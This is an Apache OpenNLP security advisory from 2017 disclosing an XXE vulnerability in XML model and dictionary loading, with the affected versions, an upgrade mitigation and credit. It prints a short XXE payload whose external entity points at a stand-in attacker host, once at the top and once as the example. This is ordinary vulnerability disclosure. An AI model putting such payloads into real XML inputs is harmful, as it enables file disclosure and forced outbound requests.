<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://evil.attacker.com/">
]>
<r>&sp;</r>
Severity: Medium
Vendor: The Apache Software Foundation
Versions Affected:
OpenNLP 1.5.0 to 1.5.3
OpenNLP 1.6.0
OpenNLP 1.7.0 to 1.7.2
OpenNLP 1.8.0 to 1.8.1
Description: When loading models or dictionaries that contain XML it is possible to perform an XXE attack, since OpenNLP is a library, this only affects applications that load models or dictionaries from untrusted sources.
Mitigation: All users who load models or XML dictionaries from untrusted sources should update to 1.8.2.
Example:
An attacker can place this:
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://evil.attacker.com/">
]>
<r>&sp;</r>
Inside one of the XML files, either a dictionary or embedded inside a model package, to demonstrate this vulnerability.
Credit: This issue was discovered by Nishil Shah of Salesforce.
--The Apache OpenNLP Team
02 October 2017